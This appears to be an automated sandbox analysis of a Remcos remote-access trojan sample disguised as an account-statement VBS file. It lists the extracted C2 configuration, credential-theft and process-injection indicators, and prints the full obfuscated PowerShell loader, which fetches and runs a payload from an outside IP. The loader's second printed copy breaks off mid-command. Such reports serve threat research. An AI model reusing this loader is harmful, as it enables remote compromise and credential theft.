remcos | e56414d23e4108bd953e0648467f6d62bf5895eb43967f2b34828bc87649fbc6

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
03-07-2024 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

STATEMENT OF ACCOUNT.vbs
Size

26KB
MD5

aa6aa1ff2c749570b67fe6c299af0da7
SHA1

ce00d3718d67b145e2953520292d7f230143a8c4
SHA256

e77df90c6642d268ece623b00aae363c8075d9715ddbed1d808d4561772532ec
SHA512

dc26694ec7f3ec408ac4774751e9c3feb43afd826b95e2a782bef239d13116facbe7add9ec0fa3bba26abee8e8039d74e421f27ea06337964fba4f28049c4086
SSDEEP

384:vhkpV0T7xxHYTYdr2veaUeYptuwykaxeWbuwmdCYUmtS9Dm:vKz0TtK2yeFeQuvkWJXwS9Dm

Score

10^/10

remcos remotehost collection rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

103.237.87.32:1999

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-VEYV6I
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral1/memory/2156-61-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers

Processes:

resource yara_rule

behavioral1/memory/3472-60-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView

resource	yara_rule
behavioral1/memory/2156-61-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

resource	yara_rule
behavioral1/memory/3472-60-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2156-61-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/4208-67-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/3472-60-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 3820 WScript.exe
7 2040 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation WScript.exe
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
collection

Email Collection
T1114

Processes:

wab.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

3552 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

4692 powershell.exe
3552 wab.exe

flow	pid	process
3	3820	WScript.exe
7	2040	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	WScript.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

pid	process
3552	wab.exe

pid	process
4692	powershell.exe
3552	wab.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exewab.exe

description	pid	process	target process
PID 4692 set thread context of 3552	4692	powershell.exe	wab.exe
PID 3552 set thread context of 3472	3552	wab.exe	wab.exe
PID 3552 set thread context of 2156	3552	wab.exe	wab.exe
PID 3552 set thread context of 4208	3552	wab.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exewab.exewab.exe

pid process

2040 powershell.exe
2040 powershell.exe
4692 powershell.exe
4692 powershell.exe
4692 powershell.exe
3472 wab.exe
3472 wab.exe
4208 wab.exe
4208 wab.exe
3472 wab.exe
3472 wab.exe
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exewab.exe

pid process

4692 powershell.exe
3552 wab.exe
3552 wab.exe
3552 wab.exe
3552 wab.exe
3552 wab.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2040 powershell.exe
Token: SeDebugPrivilege 4692 powershell.exe
Token: SeDebugPrivilege 4208 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

3552 wab.exe

pid	process
2040	powershell.exe
2040	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
3472	wab.exe
3472	wab.exe
4208	wab.exe
4208	wab.exe
3472	wab.exe
3472	wab.exe

pid	process
4692	powershell.exe
3552	wab.exe
3552	wab.exe
3552	wab.exe
3552	wab.exe
3552	wab.exe

description	pid	process
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	4692	powershell.exe
Token: SeDebugPrivilege	4208	wab.exe

pid	process
3552	wab.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.exe

description	pid	process	target process
PID 3820 wrote to memory of 2040	3820	WScript.exe	powershell.exe
PID 3820 wrote to memory of 2040	3820	WScript.exe	powershell.exe
PID 2040 wrote to memory of 2332	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 2332	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 4692	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 4692	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 4692	2040	powershell.exe	powershell.exe
PID 4692 wrote to memory of 4760	4692	powershell.exe	cmd.exe
PID 4692 wrote to memory of 4760	4692	powershell.exe	cmd.exe
PID 4692 wrote to memory of 4760	4692	powershell.exe	cmd.exe
PID 4692 wrote to memory of 3552	4692	powershell.exe	wab.exe
PID 4692 wrote to memory of 3552	4692	powershell.exe	wab.exe
PID 4692 wrote to memory of 3552	4692	powershell.exe	wab.exe
PID 4692 wrote to memory of 3552	4692	powershell.exe	wab.exe
PID 4692 wrote to memory of 3552	4692	powershell.exe	wab.exe
PID 3552 wrote to memory of 3472	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 3472	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 3472	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 3472	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 1764	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 1764	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 1764	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 3280	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 3280	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 3280	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 2156	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 2156	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 2156	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 2156	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 4208	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 4208	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 4208	3552	wab.exe	wab.exe
PID 3552 wrote to memory of 4208	3552	wab.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'haussen Grnseegnen Floorshow Reklamationsperioders Verdensdelenes Dissektioners Hoffrdig Fangehul118 Prerejection Iconicity Dissonans udvide Forbisete Nysseligere Methuen besgslandbrug Tilbagefaldsfeberen Lnregulerings Prioritetsrkkeflgers Edderdunets Sorteringsformen Glamouriseringens Erratics Elephanta105 haussen Grnseegnen Floorshow Reklamationsperioders Verdensdelenes Dissektioners Hoffrdig Fangehul118 Prerejection Iconicity Dissonans udvide Forbisete Nysseligere Methuen besgslandbrug Tilbagefaldsfeberen Lnregulerings Prioritetsrkkeflgers Edderdunets Sorteringsformen Glamouriseringens Erratics Elephanta105';If (${host}.CurrentCulture) {$Gstende229++;}Function Brneaarene($Kontrapunktiske){$Berggyltendentitetens=$Kontrapunktiske.Length-$Gstende229;$Jordskorpen='SUBsTRI';$Jordskorpen+='ng';For( $Berggylten=7;$Berggylten -lt $Berggyltendentitetens;$Berggylten+=8){$haussen+=$Kontrapunktiske.$Jordskorpen.Invoke( $Berggylten, $Gstende229);}$haussen;}function Eschel($Foyerens){ & ($Crotalism) ($Foyerens);}$Conourish=Brneaarene 'StrandiMPyridoxo TidlnnzKthibhsi MarkkalPolysemlsammenbadetekti/Advocat5 .dapti.nondeaf0Sinapis Alarmfu( EstlanWMithridiAnstteln Portiod AzuritoFugientwSikkerhsArquifo DuplikaN BankkuTC.rriva Millimi1Produkt0Preside. Wi eki0Antitet;Affinge argandsWKaffesliSkindfrn.piritl6 Helico4Laughso; Drifts PeasanxInso.ls6Ggepulv4Spermat;Reinter Sub rbirResumeevcomposc:Waywode1Tidsfak2Finansi1 ufferr.eksport0Sgeomra) Overne RedobleGTilvende.lutonocVierlinkPi.dsvio ylleba/Sh,ckwa2Dicetyl0Myelina1Krselsu0Sknjom.0herigen1omdispu0Atomfys1 Miave ulimicFTilsluti SildesrCoincideUncapi.f ga.rrlo ModstaxFitfuln/Vaporin1Udskriv2Landman1Restrai.Oversup0Entangl ';$Beskftigelsesfremgangs=Brneaarene 'Flun.yiUU tornbsbandageeDerivatrCathach-SuborbiAOvibovigMultrumeUdsugninsunkiestAnthoge ';$Verdensdelenes=Brneaarene ' handelhTotipaltHolocentKvalitepRek.isi:udrykni/ Bortop/Madrass1sennesb0Sekundm3Kollegi.Pension2Navlebe3Lbltern7 Honeys. G llan8 Purple6Syskrin.Nedjust2 Geniog4Unprosp7 Jocula/O,osterFsikkerhr Kime,niPrintersPrurigokTrustlep.oldefti Bysa,flNatskiflV,ggevieQuodli,tvrel,ea1Bestvle0Theines9.ythere.OverswedSofthe,w ErminepPrimi.y ';$verdensplanen=Brneaarene 'Tragaca>N heden ';$Crotalism=Brneaarene 'Shadowlicamiseseafhvlenx Unrash ';$Forngtere='Fangehul118';$Parenchymatitis = Brneaarene 'MelerineCountybcQuintelhUm ldesoKlagepu Latterl%GuerinjaUninfuspTr fikkpraketvrdE,ploita SniggotbedrageaChumpaa%Beringa\ Imp.emRGuldbr.eWheelinlbanjerda FejlagtVak,umpiStttes vExt acoaGro.thel rechar.K.esengETegnfejstradefukPlurise Afterbr&Autobus&Ubarber EphemereDebaclecBondepahFlles.noBretagn Konce tBedways ';Eschel (Brneaarene 'Vesterh$Dune,ingCentipelI.doeuroscho lmbInterfia Cten,cl L folk: Blod eB R.abdoa ,utrilt KedsomhEjerin.yCranio b TralleiAssumptu Repr ss Besynd=Asperug(BoothagcunsobermCanephrd Opstan Snowbo,/Byld,iacSkatter Fornrme$Diskod P eassuaParago,r mistnkeUltragenTownfolc U,renshDaktylky Akk,rdmEnkeltsaTppefaltPatriari OmbygntExo,asti Kinetis.anthop)Cr denc ');Eschel (Brneaarene 'Dvekons$Kultiveg Udsteml Triviao Unflatb OpslugaUnflakyl So,ver:Ko,statRClosab eInitialkvedligelC landea ThesenmMi.lijoaWangalatconsideiProgramo U,clounAcetopys Albylep RavneaeVejenshrSe vejei Anekdoo Salta dMolestee S percrsynkronsFrek.en=Tapetse$NabointVS aantae AlcidarPlumuled CremoreRituallnJordbessCommu,id F.elyaeGdningslDusrensePaapegenF,ssilaeMeldbarsTranslu.KlyngehsDicoelop vkstc.lS,oleveiTilskuetBlaareg( Udtaps$ Be.alivFina,smeAscenderTerrestdRetentieHunde.yncacozeasIn.ratepNaturfrlBemgtiga Conf tnHedvineeNonhumonAnemoch)Minimer ');Eschel (Brneaarene 'R,kvire[ V,netiNUncentre subinttHirdens.PostcomSVarmhjeeEss nitrTilknytvs,bcostiBra,dercspans.ge.tomachP BnkensoGeronteiKlagemanSpy,destCausa,iMCirroseaLeucoenn.ockatiaHummelsgSeco.deeDdsfjenr Abnorm]Overnat:Jejunac:perspirSBlinka e,frikancKi.iernu Undevers,rfabliHoydalatTilr,ngyHdqrssiPOpvindsrOpholdso PersiltTeendeooUd,ajercTeknolooBilb.salRejsnin Dirig.=Lammels O eyesk[AandemaN Sl dreeToppenot ,stnin.RangensSAcquireePrognoscArquebuuAftgtsfr SkarptiFejl,eht S,denvyTizwinpPf.ugtburSigna.roRegistetBoremeso OplevpcLigkistoR.sflell MaanedTGastrosySulfin pNonrecie Roccel]Formern: oxalg:Forsaa.TPreequalAk,ionssFedtema1Straike2Hallecr ');$Verdensdelenes=$Reklamationsperioders[0];$Countervolition= (Brneaarene ' Lauryl$ToylikegTan espl flyveioGinnerybMil.eusaGaufreulGynopha:PhenolsO AntipymZymoteclAficionbTrustabeVis,alit MicrossKorrump1 R,ssop7L ntibu0 Lalaqu=Pante nNGearskieVingesuwWheensp-SubdisjO Krostub ThroeijTransvaeFordelicSemihumtDis mpa IldkuglS,smotheyPotmenlsQuerie.tDitch ie S oppemGrubler.PistillNindsatdeUparti tReuchli. LuggagWSoodlybeJosva.mbOikophoCBrnefamlMizenmai Dan ase Operatn barkast');$Countervolition+=$Bathybius[1];Eschel ($Countervolition);Eschel (Brneaarene 'Ly.ebru$TilbageOTorulosmS,riverlFjordrebStat gaeI,trodut,arlrsts Jefkan1Trachel7Vakante0Hukomme.MeikensHUnvibraeLixiv.aa JakostdFe,ffeeeFon.sbrrdokumens,ilmret[Exorabl$UnderscBsomervieSekvenssD,dsmnskgenevoifFo,handtC,ncertiSatsbilgCyderree TrisublSummer sMisdia.eAvickbesSpumie.fMu ychirBunse,be Ghostsm Mu,difgBeautifaLockspinGeodifegEnergims,jresla]Hyp.rle= Teglhn$Gruppe.CIn.esteoSunglown.algenhoFreshenu pringrDagplejiDepl,yes inuathSmaragd ');$Fejldisponere=Brneaarene ' Con.ti$StadsgaOAarsskimI,coordlPlanndrbOpstarteServicetLepismasUskarpe1 Ston.i7 Skatte0platyce..ormaliDProvokeoTek tbewHu holdnFllede,lDisplacoJackweeaTetanisdPancreaFlousiesiforudsal,isorgaeVold,gt( egreg$EtcmodsVgabardieNytteomrW.xmakidInduceaeScoringn Fi.kersAcorusadS.epheneSvidni.lWitesgleAme,icanRokadeneMonarchsIndklam,Vandpyt$ RegulaG lasmaelG stroeaAcceptimCliqu,dogrundlouFlovendrPathnami Trep.nsSjungene ridninrJudaizeiSkder enObsessig statsheSerapianThecitysPist,ns)Pinn cl ';$Glamouriseringens=$Bathybius[0];Eschel (Brneaarene 'Bo dsme$Dis.rimgFemmernlOtherwooOrsellibGlucon,aRevelablBib.lsk: ThaineUKooperadFishhoupZ buenirStambgeeUnquerisPreemptn.zardomiAnnemarnP,tensegSkuldereN nillunAfstb i=N,aletr(in exteT,etalloeFuglekasFlg.sedtUdlseud-PolitiaPAzerbaiaCeliad.tSkoann.hUdslgen Tuck e$ Smgen GGearvlglSomewhaaYder ldmIndledeoOutsiz,uUindskrr.etvrkei EftermsOmskoleeDistingrAdgangsiPlankevnDankdamg Tuli aeconacr,n Ca.pebsProck.h),herecr ');while (!$Udpresningen) {Eschel (Brneaarene 'anthra $ AadselgUdgravelK,inteto.ygiejnbFrib,biaProtocol fodbol:Perple S DuraintR tileao F.yverlCommunalRel ableHelbredrhaemninnSubentre Ov,rjusrusland= mislab$Se ondetPoliturr Subs.duForp.gteV.ndica ') ;Eschel $Fejldisponere;Eschel (Brneaarene 'UnslopiS urdrumtContermaDisput,rPhotosctIn,anta-.andsetSSj esrgl EscalaeChecksuepolar.sp iarrho Boorish4Overde, ');Eschel (Brneaarene ' Photos$G,atitugStevenel Huberto Phelonb A.klagaNonj dilU.deror: caripUForu.end Rvegrap .emihurblollyde Arb jds .thrognTerapeuiDagdrmmn Ag,onogRorpindeLavlandnHeloder=Bnkerad( .horiaTCaughtse SyersksDilatattSivskoe-ArbejdsPUnibraca MicroftBranddahOpretho Uncha t$AabenheG SubdollSilketjaSlrenepmUnyoungo,enessauAltankarAf.nstriTekstfeshenfaldeVandfalrTrach.li DannelnSuprastgFuldrigeEjendomn raftvrs Saalbn)indhfte ') ;Eschel (Brneaarene 'Stummer$PredestgIdrtsanlGudl.epoBretessbU appeaaAppelinlReplnec:StorhedFTelefonlMoniliaoUngdom,oM crocerTmningss.plagrihTrlb.ndoResen.iwExodysm= Dehyd $ StrandgSanctimlMotonaboLaesbarbmarig,aaSmagss lFanatic: InositG.eboelsr VariatnAandsars FrdiggeTolerabeFing,rsgProredenKrebaneeClytus.n,arnumi+ Trimel+tve,and%M.stere$Roug.stR StatleeAmpexfokRidsninlpseud.saFototelmSbekassa Ordstrt shoppeiirreligoTuerrornTids.krs TenparpKassesveAdmonitrHemagogiBibemrko Bilagsdpicturae Trkd.rrTilbagesM litar. ChristcSesquino.yrkenmuCantdognTvetyditO.turat ') ;$Verdensdelenes=$Reklamationsperioders[$Floorshow];}$Subtract=338547;$Procedurens=31347;Eschel (Brneaarene ' Skumls$polyisogTia.medlV duateobattlesbSooti yaDoctrinlP,ecilo: fortalPtripersrBro.kereVelseterOut laye Driftsj OphreteInsobricRelatiotDition iOysterio Coa.fanHinshou Iltma,=.andels pho omeGXenogene TjsnortScombri-tandtekCKostskooEfterginChand ltOpstvenecomoidsnBetjentt Thooca Sttyske$ belahcGNadj molKlynkeha Glaspum PanidroDisent uPinenssrPe isariSlambassMotorhjeEngracirJenspeciS,nitarnAf,erwigTrekanteAgriolonGranulashandels ');Eschel (Brneaarene ' P.lles$NonadjugGuldrinlYngled,o bredejbBremseraUtaknemldraperf: stomapTFistre.oVoicerrmProduktlQuipsteeRetirinnRadioscdPro.osieOptagebs Anrett Sideomb=Feriere Twinho[ ,oloniSNaturloyBemrkensTilfoejt Kokk,peStudsnimtomahav.,rogramCwrigjrgo U.adhenSygeeksvGendarmerevolter AbashetTilegne] Brsteo: Kasser: permafFSprjt,lr bl,ebaoCompendminhalatBReboleraEmpassisDoorbele Hoota 6 Hollyw4bowleggSRemovertMonarkerProce.ei DeindinJulequig Forvar(Inst,nt$ SubtilPKon rolrCitole eSend mnrAabenbae Antecej ,imreseTubigancSportsgtUtilsteiTaffelboSkolepsn Re,xpo) Opgav ');Eschel (Brneaarene ' Semirh$B,ningsgDoserinlUnuanceoRiflerfb Rfsunca aa enblSatirep: D,uggeu PuseyedFactorivTroke oiMuckwordKul.urkeAbonnem Ac cia=,onbook Overtr[,ebatinSGagerinyGnom.nds AastedtMonocule.utrankmKa,otte.Regul.tTprocureeOpsaetnxphilobitFidibus.ForbogsEVovhundnUgengldcTekstkooForsnakdNitrogliMe.tesrnsuppedegUnbiass]Sttters:Udvoks :ChloranABowwortSS eretnCIndgaarIAnaglypISamf.nd.CollingG tannoge LacerttCurioloS,olkesatKretiskrC,gnituiRingbrynRupeesvgdisting( wel,er$SvarfriTCatech oBlousegmKnapbotlHurtigteDeskripnC cinerd F lkete Kle.tosTorchma) Misspe ');Eschel (Brneaarene 'Waliser$ Le,onsg eutrallAckmanboM,sfondb Pha.taaNavnelilsemivol:PopulisTSt,ftsfrCopolymaDaktyloaBurgerbdTiereranPr.cumbe YverettFejlerntRecapskeTa.demmtMillboasMet.llo=Bippern$YndestcuProb,scd NaturevGodsbaniExocycldFu,dmgteKrselso.Tilk ndsOpvelseuVandforbBegyndesFaconsttNongarrrstoejsii kurtisnPari.etgPrevisi(D kende$Cal.bitSThel,rruDrvepoebPo itict Misantr Ep,uleaIndrykncForsikrtIllogic, itter$,ombardPunpla.trSengekaooftennecPreparoeDetailsdchildriu FyldenrBegrende RaadignFalk,sas Hjemme)Skibbru ');Eschel $Traadnettets;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Relatival.Esk && echo t"
3⤵
PID:2332

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'haussen Grnseegnen Floorshow Reklamationsperioders Verdensdelenes Dissektioners Hoffrdig Fangehul118 Prerejection Iconicity Dissonans udvide Forbisete Nysseligere Methuen besgslandbrug Tilbagefaldsfeberen Lnregulerings Prioritetsrkkeflgers Edderdunets Sorteringsformen Glamouriseringens Erratics Elephanta105 haussen Grnseegnen Floorshow Reklamationsperioders Verdensdelenes Dissektioners Hoffrdig Fangehul118 Prerejection Iconicity Dissonans udvide Forbisete Nysseligere Methuen besgslandbrug Tilbagefaldsfeberen Lnregulerings Prioritetsrkkeflgers Edderdunets Sorteringsformen Glamouriseringens Erratics Elephanta105';If (${host}.CurrentCulture) {$Gstende229++;}Function Brneaarene($Kontrapunktiske){$Berggyltendentitetens=$Kontrapunktiske.Length-$Gstende229;$Jordskorpen='SUBsTRI';$Jordskorpen+='ng';For( $Berggylten=7;$Berggylten -lt $Berggyltendentitetens;$Berggylten+=8){$haussen+=$Kontrapunktiske.$Jordskorpen.Invoke( $Berggylten, $Gstende229);}$haussen;}function Eschel($Foyerens){ & ($Crotalism) ($Foyerens);}$Conourish=Brneaarene 'StrandiMPyridoxo TidlnnzKthibhsi MarkkalPolysemlsammenbadetekti/Advocat5 .dapti.nondeaf0Sinapis Alarmfu( EstlanWMithridiAnstteln Portiod AzuritoFugientwSikkerhsArquifo DuplikaN BankkuTC.rriva Millimi1Produkt0Preside. Wi eki0Antitet;Affinge argandsWKaffesliSkindfrn.piritl6 Helico4Laughso; Drifts PeasanxInso.ls6Ggepulv4Spermat;Reinter Sub rbirResumeevcomposc:Waywode1Tidsfak2Finansi1 ufferr.eksport0Sgeomra) Overne RedobleGTilvende.lutonocVierlinkPi.dsvio ylleba/Sh,ckwa2Dicetyl0Myelina1Krselsu0Sknjom.0herigen1omdispu0Atomfys1 Miave ulimicFTilsluti SildesrCoincideUncapi.f ga.rrlo ModstaxFitfuln/Vaporin1Udskriv2Landman1Restrai.Oversup0Entangl ';$Beskftigelsesfremgangs=Brneaarene 'Flun.yiUU tornbsbandageeDerivatrCathach-SuborbiAOvibovigMultrumeUdsugninsunkiestAnthoge ';$Verdensdelenes=Brneaarene ' handelhTotipaltHolocentKvalitepRek.isi:udrykni/ Bortop/Madrass1sennesb0Sekundm3Kollegi.Pension2Navlebe3Lbltern7 Honeys. G llan8 Purple6Syskrin.Nedjust2 Geniog4Unprosp7 Jocula/O,osterFsikkerhr Kime,niPrintersPrurigokTrustlep.oldefti Bysa,flNatskiflV,ggevieQuodli,tvrel,ea1Bestvle0Theines9.ythere.OverswedSofthe,w ErminepPrimi.y ';$verdensplanen=Brneaarene 'Tragaca>N heden ';$Crotalism=Brneaarene 'Shadowlicamiseseafhvlenx Unrash ';$Forngtere='Fangehul118';$Parenchymatitis = Brneaarene 'MelerineCountybcQuintelhUm ldesoKlagepu Latterl%GuerinjaUninfuspTr fikkpraketvrdE,ploita SniggotbedrageaChumpaa%Beringa\ Imp.emRGuldbr.eWheelinlbanjerda FejlagtVak,umpiStttes vExt acoaGro.thel rechar.K.esengETegnfejstradefukPlurise Afterbr&Autobus&Ubarber EphemereDebaclecBondepahFlles.noBretagn Konce tBedways ';Eschel (Brneaarene 'Vesterh$Dune,ingCentipelI.doeuroscho lmbInterfia Cten,cl L folk: Blod eB R.abdoa ,utrilt KedsomhEjerin.yCranio b TralleiAssumptu Repr ss Besynd=Asperug(BoothagcunsobermCanephrd Opstan Snowbo,/Byld,iacSkatter Fornrme$Diskod P eassuaParago,r mistnkeUltragenTownfolc U,renshDaktylky Akk,rdmEnkeltsaTppefaltPatriari OmbygntExo,asti Kinetis.anthop)Cr denc ');Eschel (Brneaarene 'Dvekons$Kultiveg Udsteml Triviao Unflatb OpslugaUnflakyl So,ver:Ko,statRClosab eInitialkvedligelC landea ThesenmMi.lijoaWangalatconsideiProgramo U,clounAcetopys Albylep RavneaeVejenshrSe vejei Anekdoo Salta dMolestee S percrsynkronsFrek.en=Tapetse$NabointVS aantae AlcidarPlumuled CremoreRituallnJordbessCommu,id F.elyaeGdningslDusrensePaapegenF,ssilaeMeldbarsTranslu.KlyngehsDicoelop vkstc.lS,oleveiTilskuetBlaareg( Udtaps$ Be.alivFina,smeAscenderTerrestdRetentieHunde.yncacozeasIn.ratepNaturfrlBemgtiga Conf tnHedvineeNonhumonAnemoch)Minimer ');Eschel (Brneaarene 'R,kvire[ V,netiNUncentre subinttHirdens.PostcomSVarmhjeeEss nitrTilknytvs,bcostiBra,dercspans.ge.tomachP BnkensoGeronteiKlagemanSpy,destCausa,iMCirroseaLeucoenn.ockatiaHummelsgSeco.deeDdsfjenr Abnorm]Overnat:Jejunac:perspirSBlinka e,frikancKi.iernu Undevers,rfabliHoydalatTilr,ngyHdqrssiPOpvindsrOpholdso PersiltTeendeooUd,ajercTeknolooBilb.salRejsnin Dirig.=Lammels O eyesk[AandemaN Sl dreeToppenot ,stnin.RangensSAcquireePrognoscArquebuuAftgtsfr SkarptiFejl,eht S,denvyTizwinpPf.ugtburSigna.roRegistetBoremeso OplevpcLigkistoR.sflell MaanedTGastrosySulfin pNonrecie Roccel]Formern: oxalg:Forsaa.TPreequalAk,ionssFedtema1Straike2Hallecr ');$Verdensdelenes=$Reklamationsperioders[0];$Countervolition= (Brneaarene ' Lauryl$ToylikegTan espl flyveioGinnerybMil.eusaGaufreulGynopha:PhenolsO AntipymZymoteclAficionbTrustabeVis,alit MicrossKorrump1 R,ssop7L ntibu0 Lalaqu=Pante nNGearskieVingesuwWheensp-SubdisjO Krostub ThroeijTransvaeFordelicSemihumtDis mpa IldkuglS,smotheyPotmenlsQuerie.tDitch ie S oppemGrubler.PistillNindsatdeUparti tReuchli. LuggagWSoodlybeJosva.mbOikophoCBrnefamlMizenmai Dan ase Operatn barkast');$Countervolition+=$Bathybius[1];Eschel ($Countervolition);Eschel (Brneaarene 'Ly.ebru$TilbageOTorulosmS,riverlFjordrebStat gaeI,trodut,arlrsts Jefkan1Trachel7Vakante0Hukomme.MeikensHUnvibraeLixiv.aa JakostdFe,ffeeeFon.sbrrdokumens,ilmret[Exorabl$UnderscBsomervieSekvenssD,dsmnskgenevoifFo,handtC,ncertiSatsbilgCyderree TrisublSummer sMisdia.eAvickbesSpumie.fMu ychirBunse,be Ghostsm Mu,difgBeautifaLockspinGeodifegEnergims,jresla]Hyp.rle= Teglhn$Gruppe.CIn.esteoSunglown.algenhoFreshenu pringrDagplejiDepl,yes inuathSmaragd ');$Fejldisponere=Brneaarene ' Con.ti$StadsgaOAarsskimI,coordlPlanndrbOpstarteServicetLepismasUskarpe1 Ston.i7 Skatte0platyce..ormaliDProvokeoTek tbewHu holdnFllede,lDisplacoJackweeaTetanisdPancreaFlousiesiforudsal,isorgaeVold,gt( egreg$EtcmodsVgabardieNytteomrW.xmakidInduceaeScoringn Fi.kersAcorusadS.epheneSvidni.lWitesgleAme,icanRokadeneMonarchsIndklam,Vandpyt$ RegulaG lasmaelG stroeaAcceptimCliqu,dogrundlouFlovendrPathnami Trep.nsSjungene ridninrJudaizeiSkder enObsessig statsheSerapianThecitysPist,ns)Pinn cl ';$Glamouriseringens=$Bathybius[0];Eschel (Brneaarene 'Bo dsme$Dis.rimgFemmernlOtherwooOrsellibGlucon,aRevelablBib.lsk: ThaineUKooperadFishhoupZ buenirStambgeeUnquerisPreemptn.zardomiAnnemarnP,tensegSkuldereN nillunAfstb i=N,aletr(in exteT,etalloeFuglekasFlg.sedtUdlseud-PolitiaPAzerbaiaCeliad.tSkoann.hUdslgen Tuck e$ Smgen GGearvlglSomewhaaYder ldmIndledeoOutsiz,uUindskrr.etvrkei EftermsOmskoleeDistingrAdgangsiPlankevnDankdamg Tuli aeconacr,n Ca.pebsProck.h),herecr ');while (!$Udpresningen) {Eschel (Brneaarene 'anthra $ AadselgUdgravelK,inteto.ygiejnbFrib,biaProtocol fodbol:Perple S DuraintR tileao F.yverlCommunalRel ableHelbredrhaemninnSubentre Ov,rjusrusland= mislab$Se ondetPoliturr Subs.duForp.gteV.ndica ') ;Eschel $Fejldisponere;Eschel (Brneaarene 'UnslopiS urdrumtContermaDisput,rPhotosctIn,anta-.andsetSSj esrgl EscalaeChecksuepolar.sp iarrho Boorish4Overde, ');Eschel (Brneaarene ' Photos$G,atitugStevenel Huberto Phelonb A.klagaNonj dilU.deror: caripUForu.end Rvegrap .emihurblollyde Arb jds .thrognTerapeuiDagdrmmn Ag,onogRorpindeLavlandnHeloder=Bnkerad( .horiaTCaughtse SyersksDilatattSivskoe-ArbejdsPUnibraca MicroftBranddahOpretho Uncha t$AabenheG 